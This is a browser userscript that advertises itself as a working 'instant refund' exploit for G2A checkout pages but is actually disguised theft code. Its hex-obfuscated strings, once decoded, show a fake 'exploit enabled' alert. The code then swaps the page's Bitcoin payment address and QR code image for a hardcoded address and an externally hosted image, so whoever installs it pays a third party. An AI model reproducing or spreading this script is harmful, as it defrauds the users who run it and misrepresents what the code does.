// ==UserScript==
// @name         G2A Script
// @namespace    Bounty
// @version      9.0
// @description  G2A Instant Refund Vulnerbility
// @author       GamerBoy	
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==

var _0x128a=
["\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x65\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","row","getElementsByClassName","innerHTML","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3A\x20\x33\x33\x47\x42\x6a\x61\x52\x64\x38\x6f\x6e\x38\x57\x34\x42\x5a\x68\x58\x56\x42\x71\x35\x31\x57\x31\x47\x62\x41\x42\x39\x67\x65\x37\x6b","src","code","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x2e\x69\x6d\x67\x75\x72\x2e\x63\x6f\x6d\x2f\x6d\x6a\x41\x79\x64\x50\x68\x2e\x70\x6e\x67","length"];alert(_0x128a[0]);var _0x4892da=setInterval(function()
{
	var _0xf782x2=document[_0x128a[2]](_0x128a[1]);	_0xf782x2[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0]
	[_0x128a[5]]= _0x128a[7];var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
	if(_0xf782x3[_0x128a[8]]> 0)
	{
		clearInterval(_0x4892da)
	}
}
,10)

//Backend-Exploit | Status: Working